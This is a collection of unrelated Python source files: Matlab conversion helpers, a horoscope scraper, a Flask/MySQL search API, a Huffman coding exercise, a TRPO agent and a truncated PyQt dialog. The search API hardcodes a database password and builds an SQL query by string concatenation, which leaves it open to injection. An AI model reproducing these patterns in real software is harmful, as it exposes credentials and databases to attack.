process_sd_data(data)\nwrite_sd_to_file(processed_data)\n","sub_path":"process_sd_data.py","file_name":"process_sd_data.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17287834","text":"\"\"\"\nauthor: Xu Wang\nemail: i@xuwang.im\n\nPublished under GPL 2.0\n\nA collection of tools to connect Python and Matlab.\n\"\"\"\n\nimport numpy as np\n\ndef is_integer(i):\n if type(i) is int or type(i) is np.int64:\n return True\n else:\n return False\n\ndef matrix_to_matlab_string(v):\n \"\"\"\n convert a python matrix or vector to a matlab 'm' file string\n \"\"\"\n if is_integer(v[0]):\n # v is a vector, not a matrix\n t = ['[']\n for vi in v:\n t.append('%s ' % vi)\n t.append(']')\n return ''.join(t)\n else:\n t = ['[']\n for i in range(0, len(v)):\n vi = v[i]\n ti = ['[']\n for j in vi:\n ti.append('%s ' % j)\n ti.append(']')\n if i < len(v) - 1:\n ti.append(';\\n')\n t.append(''.join(ti))\n t.append(']')\n return ''.join(t)\n\ndef create_petri_net_matlab_file(file_name, pn, marking=None):\n \"\"\"\n write matlab style Petri net matrices to file_name\n :param file_name: a string, the filename\n :param pn: a PetriNet\n :param marking: a Marking\n :return: None\n \"\"\"\n fid = open(file_name, 'w')\n fid.write(pn.to_matlab_string(marking))\n\ndef max_key_in_dict(d):\n \"\"\"\n Find the max key in d\n :param d: is a dict whose keys are integers\n :return: the max key\n \"\"\"\n return max(d.keys())\n\ndef time_interval_to_matlab_string(theta):\n \"\"\"\n Convert time intervals in 
TPN to matlab\n    :param theta: a dict theta[ti] = [a, b], ti belongs to integers\n    :return: string\n    \"\"\"\n    string = ['I = [']\n    for i in range(0, max_key_in_dict(theta)+1):\n        if i in theta:\n            string.append(str(theta[i]).replace(',', ';'))\n        else:\n            string.append('[0; inf]')\n        if i < max_key_in_dict(theta):\n            string.append(',')\n    string.append('];')\n    return ''.join(string)\n\n
def matlab_style_index(v):\n    \"\"\"\n    convert the list of indices v to matlab style: for each i in v, i += 1\n    :param v: a list of indices in Python style (starting from 0)\n    :return: a list of indices in matlab style (starting from 1)\n    \"\"\"\n    m_v = list(v)\n    for i in range(0, len(m_v)):\n        m_v[i] += 1\n    return m_v","sub_path":"matlab.py","file_name":"matlab.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249223202","text":"#!/usr/bin/env python3\n#Author:Anshuman Mukherjee\n'''\nPulls the horoscopes from the following sources\nganeshaspeaks.com\nastrology.com\nhoroscope.com\n\nusage: horoscope.py [-h] [-s SIGN] [-d DAY]\n\nDisplay the daily horoscope based on time and sign\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -s SIGN, --sign SIGN  enter the full sun sign\n  -d DAY, --day DAY     enter yesterday, today or tomorrow\n\nScript created for fun and learning, should be used by one's own discretion\n'''\n\n
import urllib.request, urllib.error, urllib.parse\nimport re, argparse, datetime\nfrom bs4 import BeautifulSoup as soup\nfrom datetime import datetime, timedelta\n\n
def Download_Page(url, user_agent='fatso', num_retries=2):\n\t#print \turl\n\theaders = {'User-agent':user_agent}\n\trequest = urllib.request.Request(url, headers=headers)\n\ttry:\n\t\thtml = urllib.request.urlopen(request).read()\n\n\texcept urllib.error.URLError as e:\n\t\thtml = None\n\t\tif num_retries > 0:\n\t\t\tif hasattr(e,'code') and 500 <= e.code < 600:\n\t\t\t\treturn Download_Page(url, user_agent, num_retries - 1)\n\treturn html\n\n
def from_Horoscope_com(time = \"today\", sign = \"aquarius\"):\n\t'''Pull horoscope from horoscope.com'''\n\tsign_dict = {\"aries\":\"1\",\"taurus\":\"2\",\"gemini\":\"3\",\"cancer\":\"4\",\n\t\"leo\":\"5\",\"virgo\":\"6\",\"libra\":\"7\",\"scorpio\":\"8\",\n\t\"sagittarius\":\"9\",\"capricorn\":\"10\",\"aquarius\":\"11\",\"pisces\":\"12\"}\n\n
\tbase_url = \"https://www.horoscope.com/us/horoscopes/general/\"\n\tif time == 'today':\n\t\tfetch_url = base_url + \"horoscope-general-daily-today.aspx?sign=\" + sign_dict[sign]\n\telif time == 'yesterday':\n\t\tfetch_url = base_url + \"horoscope-general-daily-yesterday.aspx?sign=\" + sign_dict[sign]\n\telse:\n\t\tfetch_url = base_url + \"horoscope-general-daily-tomorrow.aspx?sign=\" + sign_dict[sign]\n\thtm = Download_Page(fetch_url)\n\tif htm != None:\n\t\tdata = soup(htm, 'lxml')\n\t\ttr = data.find(\"div\",{\"class\":\"main-horoscope\"}).find(\"p\")\n\t\treturn tr\n\telse:\n\t\treturn 0\n\n
def from_Astrology_com(time = \"today\", sign = \"aquarius\"):\n\t''' Pull horoscope from astrology.com'''\n\tbase_url = 'https://www.astrology.com/horoscope/daily'\n\tfetch_url = base_url + '/' + time + '/' + str(sign) + '.html'\n\thtm = Download_Page(fetch_url)\n\tif htm != None:\n\t\tdata = soup(htm, 'lxml')\n\t\ttr = data.find(\"div\", {\"class\":\"horoscope-main grid grid-right-sidebar primis-rr\"}).find(\"p\")\n\t\treturn tr\n\telse:\n\t\treturn 0\n
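\n# Illustrative note (added): each scraper builds the provider URL, fetches it with\n# Download_Page(), and returns the first matching <p> tag, or 0 on download failure; e.g.\n# from_Astrology_com(\"today\", \"leo\") parses https://www.astrology.com/horoscope/daily/today/leo.html\n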
\ndef from_GaneshaSpeaks(time = \"today\", sign = \"aquarius\"):\n\t''' Pull horoscope from ganeshaspeaks.com'''\n\tbase_url = \"https://www.ganeshaspeaks.com/horoscopes/\"\n\tif time == 'today':\n\t\tfetch_url = base_url + \"daily-horoscope/\" + sign + \"/\"\n\telif time == 'yesterday':\n\t\tfetch_url = base_url + \"yesterday-horoscope/\" + sign + \"/\"\n\telse:\n\t\tfetch_url = base_url + \"tomorrow-horoscope/\" + sign + \"/\"\n\thtm = Download_Page(fetch_url)\n\tif htm != None:\n\t\tdata = soup(htm, 'lxml')\n\t\ttr = data.find(\"div\",{\"class\":\"row card-padding-20 container-fluid-xs margin-bottom-xs-0\"}).find(\"p\",{\"class\":\"margin-top-xs-0\"})\n\t\treturn tr\n\telse:\n\t\treturn 0\n\n
def cal_date(day):\n\tnow = datetime.now()\n\tif day == \"tomorrow\":\n\t\treturn now + timedelta(days = 1)\n\telif day == \"yesterday\":\n\t\treturn now - timedelta(days = 1)\n\telse:\n\t\treturn now\n\n\n
def main():\n\t'Main function to call the other functions'\n\tparser = argparse.ArgumentParser(description='Display the daily horoscope based on time and sign')\n\tparser.add_argument('-s', '--sign', help='enter the full sun sign', default='aquarius')\n\tparser.add_argument('-d', '--day', help='enter yesterday, today or tomorrow', default='today')\n\targs = parser.parse_args()\n\t# passing the args to the horoscope-fetching functions\n\tprophecy_date = cal_date(args.day)\n\tbejan_info = from_GaneshaSpeaks(args.day, args.sign)\n\tastro_info = from_Astrology_com(args.day, args.sign)\n\thoro_info = from_Horoscope_com(args.day, args.sign)\n\n
\tif bejan_info == 0 or astro_info == 0 or horo_info == 0:\n\t\tprint(\"Sorry, no horoscope. Kindly check the details provided: %(day)s , %(sign)s\" %{'day':args.day, 'sign':args.sign})\n\telse:\n\t\tprint(\"\\n{}:\\n\".format(str(args.sign).capitalize()))\n\t\tprint(prophecy_date.strftime(\"%b, %d %Y:\\n\"))\n\t\tprint(\"#From ganeshaspeaks.com for {}\\n\".format(args.sign))\n\t\tprint(bejan_info.text.strip(), '\\n')\n\t\tprint(\"#From astrology.com for {}\\n\".format(args.sign))\n\t\tprint(astro_info.text.split(\":\")[1].strip(), '\\n')\n\t\tprint(\"#From horoscope.com for {}\\n\".format(args.sign))\n\t\tprint(horo_info.text.split(\"-\")[1].strip(), '\\n')\n\n
if __name__ == '__main__':\n\tmain()\n","sub_path":"horoscope.py","file_name":"horoscope.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544108995","text":"import mysql.connector\nfrom flask import jsonify\nimport json\nfrom flask import Flask\nfrom flask import request\n\napplication = Flask(__name__)\n\n\n
def setupConnection():\n    conn = mysql.connector.connect(\n        user='aramis',\n        password='CsGetDegrees648!',\n        host='localhost',\n        database='CsGetDegrees',\n        auth_plugin='mysql_native_password')\n    cursor = conn.cursor()\n    return conn, cursor\n\n\n
def search(q):\n    conn, cursor = setupConnection()\n    cursor.execute(\"select * from Product\")\n    allproducts = cursor.fetchall()\n    conn.close()\n    jsonArray = []\n    for element in allproducts:\n        jsonArray.append(json.dumps(\n            {'pid': element[0], 'name': element[1], 'price': element[2], 'tags': element[3], 'category': element[4],\n             'description': element[5], 'product_creator': element[6], 'product_buyer': element[7]}))\n    return structureIntoValidJson(jsonArray)\n\n
def retrieveProductsByName(productName):\n
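    # Added note: the query below is built by string concatenation, which is injection-prone;\n    # mysql.connector's cursor.execute(query, params) form is the safer alternative.\n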
    productTableNameQuery = \"select * from Product where name = \\'\" + productName + \"\\'\"\n    conn, cursor = setupConnection()\n    cursor.execute(productTableNameQuery)\n    productmatches = cursor.fetchall()\n    conn.close()\n    jsonArray = []\n    for element in productmatches:\n        jsonArray.append(json.dumps({'pid': element[0], 'name': element[1], 'price': element[2], 'tags': element[3], 'category': element[4], 'description': element[5], 'product_creator': element[6], 'product_buyer': element[7]}))\n    return structureIntoValidJson(jsonArray)\n\n
def structureIntoValidJson(jsonArray):\n    jsonStructure = \"{\\n\\\"data\\\": [\"\n    for i in jsonArray:\n        jsonStructure = jsonStructure + \"\\n\"\n        jsonStructure = jsonStructure + i + \", \"\n    jsonStructure = jsonStructure[:-2]\n    jsonStructure = jsonStructure + \"\\n]\\n}\"\n    return jsonStructure\n","sub_path":"application/back-end/myproject/searchAPI.py","file_name":"searchAPI.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522055196","text":"# checker:\n# https://practice.geeksforgeeks.org/problems/huffman-encoding/0\n# docs:\n# https://www.geeksforgeeks.org/efficient-huffman-coding-for-sorted-input-greedy-algo-4/\n\nfrom collections import deque\n\n\"\"\"\nfor test\n\n1\nabcdef\n5 9 12 13 16 45\n\n\"\"\"\n\n\n
class HuffmanCodeItem:\n\n    def __init__(self, letter, freq, left=None, right=None):\n        self.letter = letter\n        self.freq = freq\n        self.left = left\n        self.right = right\n\n\n
class HuffmanCode:\n\n    def __init__(self, letters, frequencies):\n        self.queue_1 = deque()\n        self.queue_2 = deque()\n        for i in range(len(letters)):\n            self.queue_1.append(HuffmanCodeItem(letters[i], frequencies[i]))\n\n
        # building huffman tree\n        # we need first condition for first iteration case where we take 2 elements\n        # from q1, merge them and push into q2\n        while len(self.queue_1) != 0 or len(self.queue_2) != 1:\n            left = self.find_min_and_pop()\n            right = self.find_min_and_pop()\n\n            self.queue_2.append(HuffmanCodeItem('$', left.freq + right.freq, left, right))\n\n
    def find_min_and_pop(self):\n        # queue_1 holds the leaves (input frequencies are assumed sorted ascending, per\n        # the linked write-up) and queue_2 holds merged subtrees in creation order,\n        # so the overall minimum always sits at one of the two fronts\n        if not self.queue_1:\n            return self.queue_2.popleft()\n\n        if not self.queue_2:\n            return self.queue_1.popleft()\n\n        if self.queue_1[0].freq <= self.queue_2[0].freq:\n            return self.queue_1.popleft()\n        return self.queue_2.popleft()\n\n
    def print_ans_aux(self, item, str_collector):\n        if item is None:\n            return\n\n        if item.letter != '$':\n            print(str_collector, end=' ')\n\n        self.print_ans_aux(item.left, str_collector + '0')\n        self.print_ans_aux(item.right, str_collector + '1')\n\n
    def print_ans(self):\n        ans = self.queue_2.popleft()\n        self.print_ans_aux(ans, '')\n\n\n
if __name__ == '__main__':\n\n    t = int(input())\n    for _ in range(t):\n        l = list(input())\n        f = list(map(int, input().split()))\n        coded = HuffmanCode(l, f)\n        coded.print_ans()\n","sub_path":"code/themes/greedy/huffman_encoding/python/n.py","file_name":"n.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"430099482","text":"from utils import *\nimport numpy as np\nimport random\nimport tensorflow as tf\nimport time\nimport os\nimport logging\nfrom gym import envs, scoreboard\nimport tempfile\nimport sys\nfrom collections import namedtuple\n\n\ntiny = 1e-10\n\n\n
def create_config():\n    MyConfig = namedtuple('MyConfig', ['timesteps_per_batch', 'max_pathlength', 'max_kl', 'cg_damping', 'gamma'])\n    config = MyConfig(timesteps_per_batch=6000,\n                      max_pathlength=200,\n                      max_kl=0.01,\n                      cg_damping=0.1,\n                      gamma=0.99)\n    return config\n\n\n
def normal_log_prob(x, mean, log_std, dim):\n    \"\"\"\n    x: [batch, dim]\n    return: [batch]\n    \"\"\"\n    zs = (x - mean) / tf.exp(log_std)\n
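    # Added note: this is the log-density of a diagonal Gaussian, summed over dims:\n    #   log p(x) = -sum(log_std) - 0.5 * sum(zs**2) - 0.5 * dim * log(2*pi)\n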
    return - tf.reduce_sum(log_std, axis=1) - \\\n        0.5 * tf.reduce_sum(tf.square(zs), axis=1) - \\\n        0.5 * dim * np.log(2 * np.pi)\n\n\n
def normal_kl(old_mean, old_log_std, new_mean, new_log_std):\n    \"\"\"\n    mean, log_std: [batch, dim]\n    return: [batch]\n    \"\"\"\n    old_std = tf.exp(old_log_std)\n    new_std = tf.exp(new_log_std)\n    numerator = tf.square(old_mean - new_mean) + \\\n        tf.square(old_std) - tf.square(new_std)\n    denominator = 2 * tf.square(new_std) + tiny\n    return tf.reduce_sum(\n        numerator / denominator + new_log_std - old_log_std, axis=1)\n\n\n
def normal_entropy(log_std):\n    return tf.reduce_sum(log_std + np.log(np.sqrt(2 * np.pi * np.e)), axis=1)\n\n\n
class TRPOAgent(object):\n    def __init__(self, env):\n        self.config = create_config()\n        self.env = env\n\n        print(\"Observation Space\", env.observation_space)\n        print(\"Action Space\", env.action_space)\n\n        self.obs_dim = obs_dim = env.observation_space.shape[0]\n        self.act_dim = act_dim = env.action_space.shape[0]\n\n        self.session = tf.Session()\n        self.end_count = 0\n        self.train = True\n\n
        # obs = [ current obs, previous obs, previous action ]\n        self.obs = obs = tf.placeholder(tf.float32, shape=[None, obs_dim], name=\"obs\")\n        self.prev_obs = np.zeros((1, obs_dim), dtype=np.float32)\n        self.prev_action = np.zeros((1, act_dim), dtype=np.float32)\n        self.action = action = tf.placeholder(tf.float32, shape=[None, act_dim], name=\"action\")\n        self.advant = advant = tf.placeholder(tf.float32, shape=[None], name=\"advant\")\n\n
        self.oldact_mean = oldact_mean = tf.placeholder(tf.float32, shape=[None, act_dim], name=\"oldaction_mean\")\n        self.oldact_logstd = oldact_logstd = tf.placeholder(tf.float32, shape=[None, act_dim], name=\"oldaction_logstd\")\n\n
        # Create neural network.\n        layer_h1 = tf.nn.relu(dense(obs, 32, 'hidden1', 1.0))\n        layer_h2 = tf.nn.relu(dense(layer_h1, 8, 'hidden2', 1.0))\n        self.act_mean = act_mean = dense(layer_h2, act_dim, 'action_mean', 0.1)\n        self.act_logstd = act_logstd = dense(layer_h2, act_dim, 'action_logstd', 0.1)\n\n
        # sample action\n        sampled_eps = tf.random_normal(tf.shape(act_mean))\n        self.sampled_action = sampled_action = sampled_eps * tf.exp(act_logstd) + act_mean\n\n
        # compute KL, log_prob, entropy\n        N = tf.shape(obs)[0]\n        p_n = normal_log_prob(action, act_mean, act_logstd, act_dim)\n        oldp_n = normal_log_prob(action, oldact_mean, oldact_logstd, act_dim)\n        ratio_n = tf.exp(p_n - oldp_n)\n        surr = -tf.reduce_mean(ratio_n * advant)  # Surrogate loss\n        var_list = tf.trainable_variables()\n        kl = tf.reduce_mean(normal_kl(oldact_mean, oldact_logstd, act_mean, act_logstd))\n        ent = tf.reduce_mean(normal_entropy(act_logstd))\n\n
        self.losses = [surr, kl, ent]\n        self.pg = flatgrad(surr, var_list)\n\n
        # KL divergence where first arg is fixed\n        # replace old->tf.stop_gradient from previous kl\n        kl_firstfixed = tf.reduce_mean(normal_kl(tf.stop_gradient(act_mean),\n                                                 tf.stop_gradient(act_logstd),\n                                                 act_mean, act_logstd))\n        grads = tf.gradients(kl_firstfixed, var_list)\n        self.flat_tangent = tf.placeholder(tf.float32, shape=[None])\n        shapes = map(var_shape, var_list)\n        start = 0\n        tangents = []\n        for shape in shapes:\n            size = np.prod(shape)\n            param = tf.reshape(self.flat_tangent[start:(start + size)], shape)\n            tangents.append(param)\n            start += size\n        gvp = [tf.reduce_sum(g * t) for (g, t) in zip(grads, tangents)]\n        self.fvp = flatgrad(gvp, var_list)\n        self.gf = GetFlat(self.session, var_list)\n        self.sff = SetFromFlat(self.session, var_list)\n        self.vf = VF(self.session)\n        self.session.run(tf.global_variables_initializer())\n\n
    def act(self, obs, *args):\n        if len(obs.shape) > 1:\n            obs = 
np.squeeze(obs)\n obs = np.expand_dims(obs, 0)\n obs_new = obs #np.concatenate([obs, self.prev_obs, self.prev_action], 1)\n\n self.prev_obs = obs\n\n action, mean, logstd = self.session.run([self.sampled_action, self.act_mean, self.act_logstd], {self.obs: obs_new})\n self.prev_action = action\n action = action[0]\n return action, mean, logstd, np.squeeze(obs_new)\n\n def learn(self, max_iters = 1000, animate = True):\n config = self.config\n start_time = time.time()\n numeptotal = 0\n for i in range(max_iters):\n print(\"\\n********** Iteration %i ************\" % i)\n # Generating paths.\n print(\"Rollout\")\n paths = rollout(\n self.env,\n self,\n config.max_pathlength,\n config.timesteps_per_batch,\n animate=(animate and i % 10 == 0))\n\n # Computing returns and estimating advantage function.\n for path in paths:\n path[\"baseline\"] = self.vf.predict(path)\n path[\"returns\"] = discount(path[\"rewards\"], config.gamma)\n path[\"advant\"] = path[\"returns\"] - path[\"baseline\"]\n\n # Updating policy.\n action_mean_n = np.concatenate([path[\"action_means\"] for path in paths])\n action_logstd_n = np.concatenate([path[\"action_logstds\"] for path in paths])\n obs_n = np.concatenate([path[\"obs\"] for path in paths])\n action_n = np.concatenate([path[\"actions\"] for path in paths])\n baseline_n = np.concatenate([path[\"baseline\"] for path in paths])\n returns_n = np.concatenate([path[\"returns\"] for path in paths])\n\n # Standardize the advantage function to have mean=0 and std=1.\n advant_n = np.concatenate([path[\"advant\"] for path in paths])\n advant_n -= advant_n.mean()\n advant_n /= (advant_n.std() + tiny)\n \n feed = {self.obs: obs_n,\n self.action: action_n,\n self.advant: advant_n,\n self.oldact_mean: action_mean_n,\n self.oldact_logstd: action_logstd_n}\n\n\n episoderewards = np.array([path[\"rewards\"].sum() for path in paths])\n\n if not self.train:\n print(\"Episode mean: %f\" % episoderewards.mean())\n self.end_count += 1\n if self.end_count > 100:\n break\n if self.train:\n # Computing baseline function for next iter.\n self.vf.fit(paths)\n thprev = self.gf()\n\n def fisher_vector_product(p):\n feed[self.flat_tangent] = p\n return self.session.run(self.fvp, feed) + config.cg_damping * p\n\n g = self.session.run(self.pg, feed_dict=feed)\n stepdir = conjugate_gradient(fisher_vector_product, -g)\n shs = .5 * stepdir.dot(fisher_vector_product(stepdir))\n lm = np.sqrt(shs / config.max_kl)\n fullstep = stepdir / lm\n neggdotstepdir = -g.dot(stepdir)\n\n def loss(th):\n self.sff(th)\n return self.session.run(self.losses[0], feed_dict=feed)\n theta = linesearch(loss, thprev, fullstep, neggdotstepdir / lm)\n self.sff(theta)\n\n surrafter, kloldnew, entropy = self.session.run(\n self.losses, feed_dict=feed)\n if kloldnew > 2.0 * config.max_kl:\n self.sff(thprev)\n\n stats = {}\n\n numeptotal += len(episoderewards)\n items = [\"Total number of episodes\", \"Average sum of rewards per episode\",\n \"Entropy\",\"Baseline explained\", \"KL between old and new distribution\",\n \"Surrogate loss\", \"Time elapsed\"]\n stats[items[0]] = numeptotal\n stats[items[1]] = episoderewards.mean()\n stats[items[2]] = entropy\n exp = explained_variance(np.array(baseline_n), np.array(returns_n))\n stats[items[3]] = exp\n stats[items[4]] = kloldnew\n stats[items[5]] = surrafter\n stats[items[6]] = \"%.2f mins\" % ((time.time() - start_time) / 60.0)\n for k in items:\n v = stats[k]\n print(k + \": \" + \" \" * (40 - len(k)) + str(v))\n if entropy != entropy:\n exit(-1)\n #if exp > 0.8:\n # self.train 
= False\n\ntf.reset_default_graph()\ntraining_dir = tempfile.mkdtemp()\nlogging.getLogger().setLevel(logging.DEBUG)\n\nif len(sys.argv) > 1:\n task = sys.argv[1]\nelse:\n #task = \"RepeatCopy-v0\"\n task = \"Pendulum-v0\"\n\nhdlr = logging.FileHandler('./log/'+task)\nlogging.getLogger().addHandler(hdlr)\n\nenv = envs.make(task)\n#env.monitor.start(training_dir)\n\n#env = SpaceConversionEnv(env, Box, Discrete)\n\nagent = TRPOAgent(env)\nagent.learn(10000, False)\n#env.monitor.close()\n#gym.upload(training_dir,\n# algorithm_id='trpo_ff')\n\n\n","sub_path":"trpo/trpo_main.py","file_name":"trpo_main.py","file_ext":"py","file_size_in_byte":9978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"352986502","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 6 13:10:01 2015\r\n\r\n@author: User\r\n\"\"\"\r\nimport logging\r\nfrom PyQt4 import QtGui, uic\r\nimport app.general.pomocne_funkcije as pomocne_funkcije\r\n\r\n\r\nbase9, form9 = uic.loadUiType('./app/view/ui_files/opcije_pomocnih.ui')\r\nclass OpcijePomocnog(base9, form9):\r\n \"\"\"\r\n Klasa je dijalog preko kojeg se bira i odredjuju postavke pomocnog\r\n grafa.\r\n \"\"\"\r\n def __init__(self, parent=None, default=None, stablo=None, copcije=None, mapa=None):\r\n logging.debug('Iniicjalizacija OpcijePomocnog, start')\r\n \"\"\"\r\n inicijalizacija sa :\r\n -*listom defaultnih postavki za graf (postojeci izbor ili neki default)\r\n -stablo, instanca modela programa mjerenja (izbor stanice/kanala/usporedno)\r\n -copcije - lista combobox opcija [[markeri], [linije]]\r\n -opisna mapa (nested), {programMjerenjaId:{stanica, kanal, usporedno....}}\r\n\r\n *lista sadrzi redom elemente:\r\n [kanal id, postaja, komponenta, usporedno, marker, markersize, line,\r\n linewidth, rgb tuple, alpha, zorder, label]\r\n \"\"\"\r\n super(base9, self).__init__(parent)\r\n self.setupUi(self)\r\n self.markeri = copcije[0] # popis svih stilova markera\r\n msg = 'self.markeri = {0}'.format(str(self.markeri))\r\n logging.debug(msg)\r\n self.linije = copcije[1] # popis svih stilova linije\r\n msg = 'self.linije = {0}'.format(str(self.linije))\r\n logging.debug(msg)\r\n if mapa == None:\r\n self.transformMapa = {};\r\n else:\r\n self.transformMapa = mapa # nested dict, programMjerenjaId:info o tom mjerenju\r\n msg = 'self.transformMapa = {0}'.format(str(self.transformMapa))\r\n logging.debug(msg)\r\n # provjeri da li je default zadan, spremi default u privatni member\r\n if default == None:\r\n #definiraj defaultnu vrijednost\r\n self.defaultGraf = [None,\r\n None,\r\n None,\r\n None,\r\n 'Bez markera',\r\n 12,\r\n 'Puna linija',\r\n 1.0,\r\n (0, 0, 255),\r\n 1.0,\r\n 5,\r\n '']\r\n else:\r\n self.defaultGraf = default\r\n msg = 'self.defaultGraf = {0}'.format(str(self.defaultGraf))\r\n logging.debug(msg)\r\n #spremi stablo u privatni member\r\n self.stablo = stablo\r\n msg = 'self.stablo = {0}'.format(repr(self.stablo))\r\n logging.debug(msg)\r\n self.inicijaliziraj()\r\n self.veze()\r\n\r\n def vrati_default_graf(self):\r\n \"\"\"\r\n funkcija vraca member self.defaultGraf u kojemu su trenutne postavke\r\n pomocnog grafa\r\n \"\"\"\r\n msg = 'returning postavke pomocnog grafa, postavke={0}'.format(str(self.defaultGraf))\r\n logging.debug(msg)\r\n return self.defaultGraf\r\n\r\n def inicijaliziraj(self):\r\n \"\"\"\r\n Inicijaliztacija dijaloga.\r\n Postavljanje defaultnih vrijednosti u comboboxeve, spinboxeve...\r\n \"\"\"\r\n # postavi model programa mjerenja u qtreeview\r\n 
self.treeView.setModel(self.stablo)\r\n #marker combo\r\n self.comboMarkerStil.clear()\r\n self.comboMarkerStil.addItems(self.markeri)\r\n self.comboMarkerStil.setCurrentIndex(self.comboMarkerStil.findText(self.defaultGraf[4]))\r\n #marker size\r\n self.spinMarker.setValue(self.defaultGraf[5])\r\n #linija combo\r\n self.comboLineStil.clear()\r\n self.comboLineStil.addItems(self.linije)\r\n self.comboLineStil.setCurrentIndex(self.comboLineStil.findText(self.defaultGraf[6]))\r\n #linija width\r\n self.doubleSpinLine.setValue(self.defaultGraf[7])\r\n #alpha vrijednost boje\r\n self.alphaBoja.setValue(self.defaultGraf[9])\r\n #boja, stil gumba\r\n rgb = self.defaultGraf[8]\r\n a = self.defaultGraf[9]\r\n self.set_widget_color_style(rgb, a, \"QPushButton\", self.bojaButton)\r\n #label\r\n self.lineEditLabel.clear()\r\n postaja = str(self.defaultGraf[1])\r\n komponenta = str(self.defaultGraf[2])\r\n usporedno = str(self.defaultGraf[3])\r\n nazivGrafa = postaja + ':' + komponenta + ':' + usporedno\r\n self.lineEditLabel.setText(nazivGrafa)\r\n self.defaultGraf[11] = nazivGrafa\r\n #pokusaj izabrati isti element u stablu (ako je element izabran)\r\n if self.defaultGraf[0] is not None:\r\n self.postavi_novi_glavni_kanal(self.defaultGraf[0])\r\n\r\n def veze(self):\r\n \"\"\"\r\n povezivanje signala koji se emitiraju prilikom interakcije sa widgetima\r\n sa funkcijama koje mjenjaju stanje grafa.\r\n \"\"\"\r\n self.lineEditLabel.textChanged.connect(self.promjeni_label)\r\n self.comboMarkerStil.currentIndexChanged.connect(self.promjeni_marker_stil)\r\n self.spinMarker.valueChanged.connect(self.promjeni_marker_size)\r\n self.comboLineStil.currentIndexChanged.connect(self.promjeni_line_stil)\r\n self.doubleSpinLine.valueChanged.connect(self.promjeni_line_width)\r\n self.bojaButton.clicked.connect(self.promjeni_boju)\r\n self.treeView.clicked.connect(self.promjeni_izbor_stabla)\r\n self.alphaBoja.valueChanged.connect(self.promjeni_alpha)\r\n\r\n def promjeni_alpha(self, x):\r\n \"\"\"\r\n promjena prozirnosti boje pomocnog kanala.\r\n \"\"\"\r\n msg = 'zahtjev za promjenom prozirnosti pomocnog kanala, alpha={0}'.format(str(x))\r\n logging.debug(msg)\r\n value = round(float(x), 2)\r\n # postavi novu vrijednost\r\n self.defaultGraf[9] = value\r\n logging.debug('vrijednost postavljena')\r\n #update boju gumba\r\n rgb = self.defaultGraf[8]\r\n logging.debug('update boje widgeta, prikaz izabrane postavke')\r\n self.set_widget_color_style(rgb,\r\n value,\r\n \"QPushButton\",\r\n self.bojaButton)\r\n\r\n def pronadji_index_od_kanala(self, kanal):\r\n \"\"\"\r\n Za zadani kanal (mjerenjeId) pronadji odgovarajuci QModelIndex u\r\n stablu.\r\n ulaz je trazeni kanal, izlaz je QModelIndex\r\n \"\"\"\r\n msg = 'pronadji_index_od_kanala, start. kanal={0}'.format(str(kanal))\r\n logging.debug(msg)\r\n # \"proseci\" stablom u potrazi za indeksom\r\n for i in range(self.stablo.rowCount()):\r\n ind = self.stablo.index(i, 0) #index stanice, (parent)\r\n otac = self.stablo.getItem(ind)\r\n for j in range(otac.childCount()):\r\n ind2 = self.stablo.index(j, 0, parent=ind) #indeks djeteta\r\n komponenta = self.stablo.getItem(ind2)\r\n #provjera da li kanal u modelu odgovara zadanom kanalu\r\n if int(komponenta._data[2]) == kanal:\r\n msg = 'pronadji_index_od_kanala, kraj. kanal={0} , index={1}'.format(str(kanal), str(ind2))\r\n logging.debug(msg)\r\n return ind2\r\n msg = 'pronadji_index_od_kanala, kraj. kanal={0} , index nije pronadjen. 
return None.'.format(str(kanal))\r\n logging.debug(msg)\r\n return None\r\n\r\n def postavi_novi_glavni_kanal(self, kanal):\r\n \"\"\"\r\n Metoda postavlja zadani kanal kao selektirani u treeView.\r\n Koristi se tijekom inicijalizacije\r\n \"\"\"\r\n msg = 'postavi_novi_glavni_kanal, start. kanal={0}'.format(str(kanal))\r\n logging.debug(msg)\r\n noviIndex = self.pronadji_index_od_kanala(kanal)\r\n if noviIndex is not None:\r\n # postavi novi indeks\r\n self.treeView.setCurrentIndex(noviIndex)\r\n #javi za promjenu izbora stabla\r\n self.promjeni_izbor_stabla(True)\r\n logging.debug('postavi_novi_glavni_kanal, kraj.')\r\n else:\r\n logging.debug('postavi_novi_glavni_kanal, kraj. Indeks nije pronadjen za zadani kanal.')\r\n\r\n def promjeni_izbor_stabla(self, x):\r\n \"\"\"\r\n promjena/izbor programa mjerenja sa stabla (Postaja/Kanal/Usporedno)\r\n \"\"\"\r\n logging.debug('promjeni_izbor_stabla, start.')\r\n ind = self.treeView.currentIndex() # dohvati trenutni aktivni indeks\r\n item = self.stablo.getItem(ind) # dohvati specificni objekt pod tim indeksom\r\n prog = item._data[2] # dohvati program mjerenja iz liste podataka\r\n msg = 'izabrani program mjerenja, id={0}'.format(str(prog))\r\n logging.debug(msg)\r\n #Ako netko izabere stanicu u stablu, prog == None\r\n #Ako netko izabere komponentu u stablu, prog == programMjerenjaId\r\n #nastavi samo ako je izabrana komponenta!\r\n if prog is not None:\r\n prog = int(prog)\r\n # uz pomoc mape self.transformMapa dohvati postaju/komponentu/usporedno\r\n postaja = str(self.transformMapa[prog]['postajaNaziv'])\r\n komponenta = str(self.transformMapa[prog]['komponentaNaziv'])\r\n usporedno = str(self.transformMapa[prog]['usporednoMjerenje'])\r\n #promjeni self.defaultGraf ciljane vrijednosti\r\n self.defaultGraf[0] = prog\r\n self.defaultGraf[1] = postaja\r\n self.defaultGraf[2] = komponenta\r\n self.defaultGraf[3] = usporedno\r\n #promjeni label da odgovara izboru\r\n tekst = postaja + ':' + komponenta + ':' + usporedno\r\n 